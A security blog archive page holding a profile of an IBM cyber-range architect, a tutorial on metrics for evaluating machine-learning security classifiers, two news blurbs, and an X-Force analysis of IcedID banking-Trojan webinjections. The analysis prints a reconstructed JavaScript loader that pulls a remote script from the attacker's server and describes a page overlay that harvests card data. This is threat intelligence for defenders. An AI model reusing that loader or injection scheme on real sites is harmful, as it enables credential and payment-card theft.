Category Archives: Threat Intelligence

How Nat Prakongpan Found His Home on the Cyber Range

While most kids were bickering with siblings and fawning over the newest toys, young Nat Prakongpan was building an enterprise network for his school.

Before he became senior manager at the IBM Integration and Threat Intelligence Lab and built a state-of-the-art cyber range from the ground up, Nat spent his childhood in Thailand surrounded by computers. He started programming at age five. At 13, he was certified in network security by one of Thailand’s national labs.

Such was his passion for computing that he stopped going to school in grade six to teach himself at home and later earn a GED — though Nat is quick to point out that his old school let him hang around without attending class, so he was “socialized.”

“When everyone was in class, I was building the computer lab,” Nat laughs. “That’s how I gained experience in building an enterprise network when I was in grade seven.”

That’s right — Nat built his school’s entire network, deploying around 500 machines with everything an enterprise network needed at that time. But this was right as the internet was starting to boom, and, of course, the system was compromised.

“That’s how I quickly pivoted to learning security,” says Nat. “I took more certification classes when I was 15 and was ultimately able to secure that network.”

From Wunderkind to Network Security Expert

So how does a Thai child genius end up in Atlanta tinkering with IBM Security products to get them to talk to each other? If you ask Nat, it was a “total fluke” — in fact, he said much of his adult life has been a series of happy accidents that led him to build IBM’s Cyber Range from the ground up.

The way Nat tells it, he had a few months between finishing his home-schooling and starting university, so he came to the U.S. to stay with his brother-in-law (who was then earning his master’s degree at the University of Florida) and attend an English-language school. His mother encouraged him to apply at the same university and, much to Nat’s surprise, he was accepted, so he stayed for the five years it took to earn his degree in computer engineering.

Like many of his classmates, he struggled to land a good job right out of school. Cue the next happy accident: A friend dragged him along to an information session by Internet Security Systems (ISS) at his alma mater. He had a chat with the team, and they called him at 7 a.m. the next day and asked him to come in for an interview “now.” He got the job and moved to Atlanta.

In an alternate universe, Nat would have led a very different life.

“I would probably have gone to a technical school somewhere in Thailand and worked at some corporation,” he says. “The U.S. and the job I’m in right now is more research and development, but a lot of jobs in Thailand or in Asia are more product users — looking for products to buy versus what we need to build to make things happen. It would be a lot less interesting.”

Home on the Cyber Range

Instead, Nat ended up at IBM Security following IBM’s acquisition of ISS. Still in Atlanta, he now leads the team that ensures all the individual products from IBM Security can work with and talk to each other to provide seamless end-to-end security for customers.

“We write the glue for those products that makes them work together,” he says. “None of them work together out of the box, but my team has the knowledge across all their areas of expertise to make one story from end to end.”

But Nat’s proudest achievement is the IBM Cyber Range in Cambridge, Massachusetts, the first-ever commercial cyber simulator offering a virtual environment in which companies can interact with real-world scenarios to bolster their threat protection and response capabilities. It’s his baby; he architected the technology, got the funding and designed the scenarios. Nat’s team then created a fictional global corporation with around 3,000 virtual workers, built an enterprise network and invented threats. The end result is a fully immersive simulation developed solely to help organizations and individuals learn about crisis situations and improve their incident response skills.

“The training in the Cyber Range is the ultimate success that I have so far: to be able to teach people and pass on the knowledge of best practices,” he says.

Nat may be among the few who built the facility, but he certainly isn’t the only one who recognizes its value. With the Cambridge location now booked more than half a year out, the IBM team set about its next challenge: taking the cyber simulator experience on tour.


Taking the Range on the Road

“One of the things we’ve learned is that our customers invest a lot of time and resources to come through the Cyber Range in Cambridge,” Nat reflects. “It is difficult for a client to bring all its high-level executives into the same location on the same day.

“We were also having a hard time deciding which IBM office would be the host of our next cyber range.”

At this point, the team began exploring more flexible options that would allow the greatest number of people to benefit from the cyber simulation experience. Ultimately, Nat and his colleagues built the first-of-its-kind IBM X-Force Command Cyber Tactical Operations Center (C-TOC).

The C-TOC is not just a state-of-the-art cyber simulation on wheels — Nat proudly explains that it is “a real security operations center (SOC) able to serve live events such as high profile conferences and sporting events.” What’s more, the C-TOC is designed to respond to a live attack.

“We can drive up to a client’s site and be able to monitor the attack, as well as perform forensic investigation on systems and networks,” Nat says.

Bringing the C-TOC from a dream to reality involved many of the same technical challenges as creating the Cambridge Cyber Range. The C-TOC, however, is a mobile unit built from the ground up, and Nat’s team therefore had a host of additional considerations to account for, including materials, lighting, electrical, air conditioning, ventilation and more. And to top it all off, they had to maintain compliance with motor vehicle regulations in the U.S. and Europe and ensure that all the technology deployed within the unit would be able to survive the twists and turns of the road.

Nat remembers the first time he heard the C-TOC idea mentioned by IBM Security VP Caleb Barlow.

“Obviously my first thought was that this is a great idea and there are so many possibilities for what we can do with this mobile platform,” he recalls. “My second thought, after I had a little more time, was, ‘Wow, I am going to be responsible for making this all happen!'”

To the surprise of none of his teammates, Nat overcame the obstacles associated with the project, and the C-TOC rolled into action in October 2018. This month, the mobile cyber range will begin a tour of Europe, bringing real-world cyber incident training across the continent.

For Nat, the most rewarding aspect of his involvement with both the Cambridge Cyber Range and the C-TOC has been the responses from IBM customers.

“The excitement we have seen over these projects was phenomenal,” he says. “I think the C-TOC especially also inspires the next generation of youngsters and college students to see what’s possible in cybersecurity and how they can be involved.”


The post How Nat Prakongpan Found His Home on the Cyber Range appeared first on Security Intelligence.

Now That You Have a Machine Learning Model, It’s Time to Evaluate Your Security Classifier

This is the third installment in a three-part series about machine learning. Be sure to read part one and part two for more context on how to choose the right artificial intelligence solution for your security problems.

As we move into this third part, we hope we have helped our readers better identify an artificial intelligence (AI) solution and select the right algorithm to address their organization’s security needs. Now, it’s time to evaluate the effectiveness of the machine learning (ML) model being used. But with so many metrics and systems available to measure security success, where does one begin?

Classification or Regression? Which Can Get Better Insights From Your Data?

By this time, you may have selected an algorithm of choice for your machine learning solution. In general, it will fall into one of two categories: classification or regression. From a security standpoint, these two types of algorithms tend to solve different problems. For example, a classifier might be used as an anomaly detector, which is often the basis of the new generation of intrusion detection and prevention systems. Meanwhile, a regression algorithm might be better at tasks such as detecting denial-of-service (DoS) attacks because these problems tend to involve numbers rather than nominal labels.

At first look, the difference between classification and regression might seem complicated, but it really isn’t. It comes down to what type of value our target variable, also called our dependent variable, contains. In that sense, the main difference between the two is that the output variable in regression is numerical, while the output for classification is categorical/discrete.

For our purposes in this blog, we’ll focus on metrics that are used to evaluate algorithms applied to supervised ML. For reference, supervised machine learning is the form of learning where we have complete labels and a ground truth. For example, we know that the data can be divided into class1 and class2, and each of our training, validation, and testing samples is labeled as belonging to class1 or class2.

Classification Algorithms – or Classifiers

To put ML to work on our data, we can select a security classifier: an algorithm whose target value is non-numeric. We want this algorithm to look at data and sort it into predefined data “classes,” usually two or more categorical, dependent variables.

For example, we might try to classify something as an attack or not an attack. We would create two labels, one for each of those classes. A classifier then takes the training set and tries to learn a “decision boundary” between the two classes. There could be more than two classes, and in some cases only one class. For example, the Modified National Institute of Standards and Technology (MNIST) database demo tries to classify an image as one of the ten possible digits from hand-written samples. This demo is often used to show the abilities of deep learning, as the deep net can output probabilities for each digit rather than one single decision. Typically, the digit with the highest probability is chosen as the answer.
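
To make the idea of a decision boundary concrete, here is a minimal sketch (not any production detection system) of a nearest-centroid classifier; the feature vectors and class labels are purely illustrative:

```python
# A minimal two-class classifier: a nearest-centroid model. The learned
# "decision boundary" is the set of points equidistant from the two
# class centroids. Features and labels below are purely illustrative,
# e.g., (failed logins per hour, megabytes uploaded to unknown hosts).

def centroid(points):
    """Component-wise mean of a list of equal-length feature vectors."""
    n = len(points)
    return tuple(sum(p[i] for p in points) / n for i in range(len(points[0])))

def train(samples, labels):
    """Compute one centroid per class from labeled training data."""
    by_class = {}
    for x, y in zip(samples, labels):
        by_class.setdefault(y, []).append(x)
    return {y: centroid(pts) for y, pts in by_class.items()}

def predict(model, x):
    """Assign x to the class whose centroid is nearest."""
    def sqdist(a, b):
        return sum((ai - bi) ** 2 for ai, bi in zip(a, b))
    return min(model, key=lambda label: sqdist(model[label], x))

X = [(1, 0.1), (2, 0.2), (40, 9.0), (50, 12.0)]
y = ["benign", "benign", "attack", "attack"]
model = train(X, y)
print(predict(model, (45, 10.0)))  # prints "attack"
```

Real anomaly detectors are far more sophisticated, but the shape of the problem — learning a boundary between labeled classes — is the same.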

A Regression Algorithm – or Regressor

A Regression algorithm, or regressor, is used when the target variable is a number. Think of a function in math: there are numbers that go into the function and there is a number that comes out of it. The task in Regression is to find what this function is. Consider the following example:

Y = 3x+9

We will now find ‘Y’ for various values of ‘X’. Therefore:

X = 1 -> Y = 12

X = 2 -> Y = 15

X = 3 -> Y = 18

The regressor’s job is to figure out what the function is by relying on the values of X and Y. If we give the algorithm enough X and Y values, it will hopefully find the function 3x+9.
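
This can be sketched in a few lines of Python. The snippet fits a line by ordinary least squares in closed form; given the exact points from the example above, it recovers the original coefficients, 3 and 9:

```python
# Fitting y = a*x + b by ordinary least squares in closed form.
# With the exact points from the example, the regressor recovers
# the original function 3x + 9.

def fit_line(xs, ys):
    n = len(xs)
    mean_x = sum(xs) / n
    mean_y = sum(ys) / n
    # slope = covariance(x, y) / variance(x); intercept follows from the means
    cov = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    var = sum((x - mean_x) ** 2 for x in xs)
    a = cov / var
    b = mean_y - a * mean_x
    return a, b

a, b = fit_line([1, 2, 3], [12, 15, 18])
print(a, b)  # -> 3.0 9.0
```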

We might want to do this in cases where we need to calculate the probability of an event being malicious. Here, we do not want a classification, as the results are not fine-grained enough. Instead, we want a confidence or probability score. So, for example, the algorithm might provide the answer that “there is a 47 percent probability that this sample is malicious.”

In the next section, we will look at the various metrics for classification and for regression that can help us determine the efficacy of our chosen ML model and, by extension, our security posture.

Metrics for Classification

Before we dive into common classification metrics, let’s define some key terms:

  • Ground truth is the set of known labels describing which class or target value is the correct solution for each example. In a binary classification problem, for instance, each example in the ground truth is labeled with the correct classification. This mirrors the training set, where we have known labels for each example.
  • Predicted labels represent the classifications that the algorithm believes are correct. That is, the output of the algorithm.
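
To see how the two relate in practice, here is a short sketch that tallies the four confusion-matrix counts from a ground-truth label list and a predicted label list; the label names are illustrative:

```python
# Tallying the four confusion-matrix counts (TP, FP, TN, FN) from a
# ground-truth label list and a predicted label list.

def confusion_counts(y_true, y_pred, positive="attack"):
    tp = fp = tn = fn = 0
    for truth, pred in zip(y_true, y_pred):
        if pred == positive:
            if truth == positive:
                tp += 1    # predicted positive, actually positive
            else:
                fp += 1    # predicted positive, actually negative
        else:
            if truth == positive:
                fn += 1    # predicted negative, actually positive
            else:
                tn += 1    # predicted negative, actually negative
    return tp, fp, tn, fn

y_true = ["attack", "attack", "benign", "benign", "attack"]
y_pred = ["attack", "benign", "benign", "attack", "attack"]
print(confusion_counts(y_true, y_pred))  # -> (2, 1, 1, 1)
```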

Now let’s take a closer look at some of the most useful metrics against which we can choose to measure the success of our machine learning deployment.

True Positive Rate

The true positive rate (TPR), also known as sensitivity, is the ratio of correctly predicted positive examples to all examples that are actually positive in the ground truth: TP/(TP+FN). Consider a running example with 100 examples in the ground truth, of which 70 are actually positive and 30 are actually negative. If the model correctly predicts 65 of the 70 positive examples, the TPR is 65/70, roughly 93 percent, sometimes written as 0.93.

False Positive Rate

The false positive rate (FPR) is the ratio of examples incorrectly predicted as positive to all examples that are actually negative in the ground truth: FP/(FP+TN). In our running example, 15 of the 30 negative examples are incorrectly predicted as positive, so the FPR is 15/30 = 50 percent, sometimes written as 0.5.

True Negative Rate

The true negative rate (TNR), also known as specificity, is the ratio of correctly predicted negative examples to all examples that are actually negative: TN/(TN+FP). In our running example, the remaining 15 of the 30 negative examples are correctly predicted as negative, so the TNR is also 15/30 = 0.5. Notice that the TNR is the complement of the FPR: the two always sum to 1.

False Negative Rate

The false negative rate (FNR) is the ratio of examples incorrectly predicted as negative to all examples that are actually positive: FN/(FN+TP). Continuing with the running example, the algorithm misses 5 of the 70 positive examples, so the FNR is 5/70, roughly 7 percent, or 0.07. The FNR is the complement of the TPR, so the two always sum to 1. In raw counts, this leaves us with TP = 65, FP = 15, TN = 15 and FN = 5, for a total of 100 examples.
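
The four rates can be computed directly from the running example’s raw counts (TP = 65, FP = 15, TN = 15, FN = 5). The sketch below uses the conventional definitions, in which each rate is expressed over the actual positives or the actual negatives rather than over all 100 examples:

```python
# The four rates for the running example's raw counts, using the
# conventional definitions: each rate is taken over the actual
# positives (TP + FN) or the actual negatives (TN + FP).

TP, FP, TN, FN = 65, 15, 15, 5

tpr = TP / (TP + FN)  # share of actual positives that were caught
fpr = FP / (FP + TN)  # share of actual negatives falsely flagged
tnr = TN / (TN + FP)  # share of actual negatives correctly cleared
fnr = FN / (FN + TP)  # share of actual positives that were missed

# Complements pair up: TPR + FNR = 1 and TNR + FPR = 1.
print(round(tpr, 3), round(fpr, 3), round(tnr, 3), round(fnr, 3))
# -> 0.929 0.5 0.5 0.071
```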


Accuracy

Accuracy measures the proportion of correct predictions, both positive and negative, to the total number of examples in the ground truth. This metric can be misleading when the classes are imbalanced: if, for instance, positive examples vastly outnumber negative examples in the ground truth, a model that predicts only the positive class well can still achieve high accuracy while telling you very little about how it handles negative examples.

Accuracy = (TP+TN)/(TP+TN+FP+FN)


Precision

Before we explore the precision metric, it’s important to define a few more terms:

  • TP is the raw number of true positives (in the above example, the TP is 65).
  • FP is the raw number of false positives (15 in the above example).
  • TN is the raw number of true negatives (15 in the above example).
  • FN is the raw number of false negatives (5 in the above example).

Precision, sometimes known as the positive predictive value, is the proportion of true positives predicted by the algorithm over the sum of all examples predicted as positive. That is, precision=TP/(TP+FP).

In our example, there were 65 positives in the ground truth that the algorithm correctly labeled as positive. However, it also labeled 15 examples as positive when they were actually negative.

These false positives go into the denominator of the precision calculation. So, we get 65/(65+15), which yields a precision of 0.81.

What does this mean? In brief, high precision means that the algorithm returned far more true positives than false positives. It is a measure of exactness, or quality: the higher the precision, the better job the algorithm did of predicting true positives while rejecting false positives.


Recall

Recall, also known as sensitivity, is the ratio of true positives to true positives plus false negatives: TP/(TP+FN).

In our example, there were 65 true positives and 5 false negatives, giving us a recall of 65/(65+5) = 0.93. Recall is a measure of completeness, or quantity: it tells us how many of the actual positives in the ground truth the algorithm managed to retrieve.

Note that there is often a trade-off between precision and recall. In other words, it’s possible to optimize one metric at the expense of the other. In a security context, we may often want to optimize recall over precision because there are circumstances where we must predict all the possible positives with a high degree of certainty.

For example, in the world of automotive security, where kinetic harm may occur, it is often heard that false positives are annoying, but false negatives can get you killed. That is a dramatic example, but it can apply to other situations as well. In intrusion prevention, for instance, a false positive on a ransomware sample is a minor nuisance, while a false negative could cause catastrophic data loss.

However, there are cases that call for optimizing precision. If you are constructing a virus encyclopedia, for example, higher precision might be preferred when analyzing one sample since the missing information will presumably be acquired from another sample.


F-Measure

An F-measure (or F1 score) is defined as the harmonic mean of precision and recall. There is a generic F-measure, which includes a variable beta that causes the harmonic mean of precision and recall to be weighted.

Typically, the evaluation of an algorithm is done using the F1 score, meaning that beta is 1 and therefore the harmonic mean of precision and recall is unweighted. The term F-measure is used as a synonym for F1 score unless beta is specified.

The F1 score is a value between 0 and 1 where the ideal score is 1, and is calculated as 2 * Precision * Recall/(Precision+Recall), or the harmonic mean. This metric typically lies between precision and recall. If both are 1, then the F-measure equals 1 as well. The F1 score has no intuitive meaning per se; it is simply a way to represent both precision and recall in one metric.
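
Putting the last three metrics together for the running example’s raw counts (TP = 65, FP = 15, FN = 5):

```python
# Precision, recall and F1 for the running example's raw counts.
# Note that F1 simplifies algebraically to 2*TP / (2*TP + FP + FN).

TP, FP, FN = 65, 15, 5

precision = TP / (TP + FP)                          # 65/80
recall = TP / (TP + FN)                             # 65/70
f1 = 2 * precision * recall / (precision + recall)  # harmonic mean

print(round(precision, 4), round(recall, 4), round(f1, 4))
# -> 0.8125 0.9286 0.8667
```

As expected, the F1 score (about 0.87) lies between the precision (0.81) and the recall (0.93).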

Matthews Correlation Coefficient

The Matthews Correlation Coefficient (MCC), sometimes written as Phi, is a representation of all four values — TP, FP, TN and FN. Unlike precision and recall, the MCC takes true negatives into account, which means it handles imbalanced classes better than other metrics. It is defined as:

MCC = (TP * TN - FP * FN) / sqrt((TP + FP)(TP + FN)(TN + FP)(TN + FN))
If the value is 1, then the classifier and ground truth are in perfect agreement. If the value is 0, then the result of the classifier is no better than random chance. If the result is -1, the classifier and the ground truth are in perfect disagreement. If this coefficient seems low (below 0.5), then you should consider using a different algorithm or fine-tuning your current one.
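
A quick computation of the MCC for the running example’s raw counts (TP = 65, FP = 15, TN = 15, FN = 5):

```python
import math

# MCC for the running example's raw counts.

TP, FP, TN, FN = 65, 15, 15, 5

numerator = TP * TN - FP * FN
denominator = math.sqrt((TP + FP) * (TP + FN) * (TN + FP) * (TN + FN))
mcc = numerator / denominator
print(round(mcc, 3))  # -> 0.491
```

At roughly 0.49, this model sits right at the fine-tuning threshold even though its accuracy of 0.8 looks healthy, which illustrates the imbalance-awareness the MCC is meant to provide.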

Youden’s Index

Also known as Youden’s J statistic, Youden’s index is the binary case of the general form of the statistic known as ‘informedness’, which applies to multiclass problems. It is calculated as (sensitivity + specificity − 1) and can be seen as the probability of an informed decision versus a random guess. In other words, it takes all four predictors into account.

Remember from our examples that sensitivity (recall) = TP/(TP+FN) and that specificity, or TNR, is the complement of the FPR. Therefore, the Youden index incorporates all measures of the predictors. If the value of Youden’s index is 0, then the probability of the decision actually being informed is no better than random chance. If it is 1, then both false positives and false negatives are 0.
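
Youden’s index for the running example’s raw counts (TP = 65, FP = 15, TN = 15, FN = 5):

```python
# Youden's index (J) for the running example's raw counts:
# J = sensitivity + specificity - 1.

TP, FP, TN, FN = 65, 15, 15, 5

sensitivity = TP / (TP + FN)   # the true positive rate
specificity = TN / (TN + FP)   # the true negative rate
j = sensitivity + specificity - 1
print(round(j, 3))  # -> 0.429
```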

Area Under the Receiver Operator Characteristic Curve

This metric, usually abbreviated as AUC or AUROC, measures the area under the curve plotted with the true positive rate on the Y-axis and the false positive rate on the X-axis. An AUC value of 0.5 means the result of the test is essentially a coin flip; you want the AUC to be as close to 1 as possible. Because it condenses performance into a single number, AUC is useful for comparing models of different types and making comparisons across experiments.
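
The area can also be computed without plotting anything, via the equivalent ranking interpretation of AUC: the probability that a randomly chosen positive example receives a higher score than a randomly chosen negative one. A small sketch with illustrative scores:

```python
# AUC via its ranking interpretation: count, over all positive/negative
# pairs, how often the positive example outscores the negative one
# (ties count as half).

def auc(pos_scores, neg_scores):
    wins = 0.0
    for p in pos_scores:
        for n in neg_scores:
            if p > n:
                wins += 1.0
            elif p == n:
                wins += 0.5
    return wins / (len(pos_scores) * len(neg_scores))

print(round(auc([0.9, 0.8, 0.4], [0.5, 0.3, 0.2]), 4))  # -> 0.8889
```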

Area Under the Precision Recall Curve

Area under the precision recall curve (AUPRC) is a measurement that, like MCC, accounts for imbalanced class distributions. If there are far more negative examples than positive examples, you might want to use AUPRC as your metric and visual plot. The curve plots precision against recall, and the closer the area is to 1, the better. Note that since this metric works best when the positive class is the rarer one, you might have to invert your labels for testing.

Average Log Loss

Average log loss represents the average penalty for a wrong prediction. It measures the difference between the probability distribution of the actual labels and the distribution predicted by the model.

In deep learning, this is sometimes known as the cross-entropy loss, which is used when the result of a classifier such as a deep learning model is a probability rather than a binary label. Cross-entropy loss is therefore the divergence of the predicted probability from the actual probability in the ground truth. This is useful in multiclass problems but is also applicable to the simplified case of binary classification.
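
A minimal sketch of average log loss for binary labels, showing how a confidently wrong prediction is penalized far more heavily than a confident, correct one:

```python
import math

# Average log loss (binary cross-entropy): the mean penalty for
# predicting probability p when the true label is y (1 or 0).

def avg_log_loss(y_true, p_pred):
    total = 0.0
    for y, p in zip(y_true, p_pred):
        total += -(y * math.log(p) + (1 - y) * math.log(1 - p))
    return total / len(y_true)

# A confident, correct model incurs a small loss...
print(round(avg_log_loss([1, 0], [0.9, 0.1]), 4))  # -> 0.1054
# ...while a confidently wrong one is penalized heavily.
print(round(avg_log_loss([1, 0], [0.1, 0.9]), 4))  # -> 2.3026
```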

By using these metrics to evaluate your ML model and tailoring them to your specific needs, you can fine-tune the model, obtain more reliable results and, ultimately, detect more threats and optimize controls as needed.

Metrics for Regression

For regression, the goal is to measure the amount of error the ML algorithm produces. The model is considered good if the error between the predicted and observed values is small.

Let’s take a closer look at some of the metrics used for evaluating regression models.

Mean Absolute Error

Mean absolute error (MAE) measures how close the predicted results are to the actual results. You can think of it as the average of the differences between the predicted values and the ground truth values: for each test example, we subtract the actual value reported in the ground truth from the value predicted by the regression algorithm and take the absolute value, then calculate the arithmetic mean of these values.

While the interpretation of this metric is well-defined, because it is an arithmetic mean, it can be skewed by very large or very small differences. Note that this value is scale-dependent, meaning that the error is on the same scale as the data. Because of this, you cannot compare two MAE values across datasets.
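
As a sketch, with illustrative predicted and actual values:

```python
# Mean absolute error: the average of |predicted - actual|. The result
# is on the same scale as the data. Values below are illustrative.

def mae(predicted, actual):
    return sum(abs(p - a) for p, a in zip(predicted, actual)) / len(actual)

print(round(mae([12.5, 14.0, 19.0], [12, 15, 18]), 4))  # -> 0.8333
```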

Root Mean Squared Error

Root mean squared error (RMSE) represents the overall prediction error in a single value: the square root of the mean of the squared differences between predicted and observed values. This is often the metric that optimization algorithms seek to minimize in regression problems. When an optimization algorithm is tuning so-called hyperparameters, it seeks to make RMSE as small as possible.

Consider, however, that like MAE, RMSE is sensitive to both large and small outliers and is scale-dependent. Therefore, you have to be careful and examine your residuals to look for outliers — values that are significantly above or below the rest of the residuals. Also, like MAE, it is improper to compare RMSE across datasets unless the scaling translations have been accounted for, because data scaling, whether by normalization or standardization, is dependent upon the data values.
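
A sketch of RMSE with illustrative predicted and actual values; note how squaring weights the larger residuals more heavily than MAE does:

```python
import math

# Root mean squared error: the square root of the mean squared
# difference between predictions and observations.

def rmse(predicted, actual):
    n = len(actual)
    return math.sqrt(sum((p - a) ** 2 for p, a in zip(predicted, actual)) / n)

print(round(rmse([12.5, 14.0, 19.0], [12, 15, 18]), 4))  # -> 0.866
```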

For example, in standardization, each value is rescaled by subtracting the mean and dividing by the standard deviation, which yields data with zero mean and unit variance. If, on the other hand, the data is normalized, the scaling is done by taking the current value, subtracting the minimum value and dividing by the quantity (maximum value – minimum value), which bounds the data between 0 and 1. These are completely different scales, and as a result, one cannot compare the RMSE between these two datasets.
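
To see why the scales differ, here is a sketch applying both transformations to the same illustrative data:

```python
import statistics

# The same data under standardization (z-scores) versus min-max
# normalization: the resulting scales are entirely different, which is
# why RMSE values computed on them cannot be compared directly.

data = [10.0, 20.0, 30.0, 40.0]

mean = statistics.mean(data)
stdev = statistics.pstdev(data)  # population standard deviation
standardized = [(x - mean) / stdev for x in data]

lo, hi = min(data), max(data)
normalized = [(x - lo) / (hi - lo) for x in data]

print([round(v, 3) for v in standardized])  # -> [-1.342, -0.447, 0.447, 1.342]
print([round(v, 3) for v in normalized])    # -> [0.0, 0.333, 0.667, 1.0]
```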

Relative Absolute Error

Relative absolute error (RAE) is the total absolute error of the predictions divided by the total absolute error of a naive model that always predicts the mean of the ground truth values. Note that this value can be compared across scales because it has been normalized.

Relative Squared Error

Relative squared error (RSE) is the total squared error of the predicted values divided by the total squared error of a naive model that always predicts the mean of the observed values. This also normalizes the error measurement so that it can be compared across datasets.
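
A sketch of both relative metrics under one common definition, in which the model’s total error is divided by the total error of a naive baseline that always predicts the mean of the ground-truth values; the data values are illustrative:

```python
# RAE and RSE under one common definition: the model's total error
# divided by the total error of a mean-predicting baseline.

def rae(predicted, actual):
    mean_a = sum(actual) / len(actual)
    model_err = sum(abs(p - a) for p, a in zip(predicted, actual))
    baseline_err = sum(abs(a - mean_a) for a in actual)
    return model_err / baseline_err

def rse(predicted, actual):
    mean_a = sum(actual) / len(actual)
    model_err = sum((p - a) ** 2 for p, a in zip(predicted, actual))
    baseline_err = sum((a - mean_a) ** 2 for a in actual)
    return model_err / baseline_err

pred, act = [12.5, 14.0, 19.0], [12, 15, 18]
print(round(rae(pred, act), 4), round(rse(pred, act), 4))  # -> 0.4167 0.125
```

Values below 1 mean the model beats the naive baseline; because both metrics are ratios, they can be compared across datasets with different scales.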

Machine Learning Can Revolutionize Your Organization’s Security

Machine learning is integral to the enhancement of cybersecurity today and it will only become more critical as the security community embraces cognitive platforms.

In this three-part series, we covered various algorithms and their security context, from cutting-edge technologies such as generative adversarial networks to more traditional algorithms that are still very powerful.

We also explored how to select the appropriate security classifier or regressor for your task, and, finally, how to evaluate the effectiveness of a classifier to help our readers better gauge the impact of optimization. With a better idea about these basics, you’re ready to examine and implement your own algorithms and to move toward revolutionizing your security program with machine learning.

The post Now That You Have a Machine Learning Model, It’s Time to Evaluate Your Security Classifier appeared first on Security Intelligence.

Government, Private Sector Unprepared for 21st Century Cyber Warfare

U.S. government agencies and businesses are largely unprepared for a major cyber attack from state-sponsored actors, and must prepare now, according to a report by key governmental-focused think tanks.

The post Government, Private Sector Unprepared for 21st Century Cyber Warfare appeared first on The Security Ledger.


ExileRAT Malware Targets Tibetan Exile Government

Researchers have discovered a new cyber-espionage campaign targeting the organization representing the exiled Tibetan government.

The post ExileRAT Malware Targets Tibetan Exile Government appeared first on The Security Ledger.


IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites

As part of the ongoing research into cybercrime tools targeting users of financial services and e-commerce, IBM X-Force analyzes the tactics, techniques and procedures (TTPs) of organized malware gangs, exposing their inner workings to help disseminate reliable threat intelligence to the security community.

In recent analysis of IcedID Trojan attacks, our team looked into how IcedID operators target e-commerce vendors in the U.S., the gang’s typical attack turf. The threat tactic is a two-step injection attack designed to steal access credentials and payment card data from victims. Given that the attack is separately operated, it’s plausible that those behind IcedID are either working on different monetization schemes or renting botnet sections to other criminals, turning it into a cybercrime-as-a-service operation similar to the Gozi Trojan’s business model.

IcedID Origins

IBM Security discovered and named IcedID in September 2017. This modern banking Trojan features modules similar to those of malware like TrickBot and Gozi. It typically targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites, and its attack turf is mainly the U.S. and Canada. Its configuration files make it evident that IcedID’s operators target business accounts in search of heftier bounties than those typically found in consumer accounts.

IcedID has the ability to launch different attack types, including webinjection, redirection and proxy redirection of all victim traffic through a port it listens on.

The malware’s distribution and infection tactics suggest that its operators are not new to the cybercrime arena; it has infected users via the Emotet Trojan since 2017 and in test campaigns launched in mid-2018, also via TrickBot. Emotet has been among the most notable malicious services catering to elite cybercrime groups from Eastern Europe over the past two years. Among its dubious customers are groups that operate QakBot, Dridex, IcedID and TrickBot.

Using ATSEngine to Orchestrate Attacks on E-Commerce Users

While current IcedID configurations feature both webinjection and malware-facilitated redirection attacks, let’s focus on its two-stage webinjection scheme. This tactic differs from that of similar Trojans, most of which deploy the entire injection either from the configuration or on the fly.

To deploy injections and collect stolen data coming from victim input, some IcedID operators use a commercial inject panel known as Yummba’s ATSEngine. ATS stands for automatic transaction system in this case. A web-based control panel, ATSEngine works from an attack/injection server, not from the malware’s command-and-control (C&C) server. It allows the attacker to orchestrate the injection process, update injections on the attack server with agility and speed, parse stolen data, and manage the operation of fraudulent transactions. Commercial transaction panels are very common and have been in widespread use since they became popular in the days of the Zeus Trojan circa 2007.

Targeting Specific E-Commerce Vendors

In the attack we examined, we realized that some IcedID operators are using the malware to target very specific brands in the e-commerce sphere. Our researchers noted that this attack is likely sectioned off from the main botnet and operated by criminals who specialize in fraudulent merchandise purchases and not necessarily bank fraud.

Let’s look at a sample code from those injections. This particular example was taken from an attack designed to steal credentials and take over the accounts of users browsing to a popular e-commerce site in the U.S.

As a first step, to receive any information from the attack server, the resident malware on the infected device must authenticate itself to the botnet’s operator. It does so using a script from the configuration file. If the bot is authenticated to the server, a malicious script is sent from the attacker’s ATSEngine server, in this case via the URL home_link/gate.php.

Notice that IcedID protects its configured instructions with encryption. The bot therefore requires a private key that authenticates it to the attacker’s web-based control panel (e.g., var pkey = “Ab1cd23”). This means the infected device will not interact with other C&C servers that may belong to other criminals or security researchers.


Figure 1: IcedID Trojan receives instructions on connecting to attack server (source: IBM Trusteer)

Next, we evaluated the eval(function(p, a, c, k, e, r)) function in the communication with the attack server and unpacked it to reveal the following code. Encoding is a common strategy to pack code and make it more compact.


Figure 2: IcedID code designed to set the browser to accept external script injections (source: IBM Trusteer)

This function sets the infected user’s browser to accept external script injections that the Trojan will fetch from its operator’s server during an active attack.

The following snippet shows the creation of a document object model (DOM) script element with type Text/javascript and the ID jsess_script_loader. The injection’s developer used this technique to inject a remote script into a legitimate webpage. It fetches the remote script from the attacker’s C&C and then embeds it in a script tag, either in the head of the original webpage or in its body.

Taking a closer look at the function used here, we can see that it loads the script from the home_link URL, passing the ssid= identifier of the infected user’s device along with the current calendar date.
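A hedged reconstruction of that loader: the element type, ID and the ssid/date query parameters match the sample, while buildScriptUrl, its argument names and the date format are illustrative assumptions:

```javascript
// Builds the remote script URL from the C&C home_link, the bot's ssid and the date.
function buildScriptUrl(home_link, ssid, date) {
  return home_link + '?ssid=' + encodeURIComponent(ssid) + '&date=' + date;
}

// In the victim's browser, the loader embeds the fetched script in the page:
function injectRemoteScript(home_link, ssid) {
  var s = document.createElement('script');   // DOM script element
  s.type = 'text/javascript';                 // type seen in the sample
  s.id = 'jsess_script_loader';               // ID seen in the sample
  s.src = buildScriptUrl(home_link, ssid, new Date().toISOString().slice(0, 10));
  (document.head || document.body).appendChild(s);
}
```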


Figure 3: IcedID code designed to inject remote script into targeted website (source: IBM Trusteer)

Steps 1 and 2: JavaScript and HTML

To perform the webinjection, an external script, a malicious JavaScript snippet, is charged with injecting HTML code into the infected user’s browser. Using this tactic, the malware does not deploy the entire injection from the configuration file, which would essentially expose it to researchers who successfully decrypt the configuration. Rather, it uses an initial injection as a trigger to fetch a second part of the injection from its attack server in real time. That way, the attack can remain more covert and the attacker can have more agility in updating injections without having to update the configuration file on all the infected devices.

In the example below, the HTML code, named ccgrab, modifies the page the victim is viewing and presents social engineering content to steal payment card data. This extra content on the page prompts the victim to provide additional information about his or her identity to log in securely.


Figure 4: IcedID tricking victim with webinjection (source: IBM Trusteer)

The malware automatically grabs the victim’s access credentials and the webinjection requests the following additional data elements pertaining to the victim’s payment card:

  • Credit card number;
  • CVV2; and
  • The victim’s state of residence.

Once the victim enters these details, the data is sent to the attacker’s ATSEngine server in a parsed form that allows the criminal to view and search it via the control panel.


Figure 5: Parsed stolen data sent to attacker’s injection server (source: IBM Trusteer)

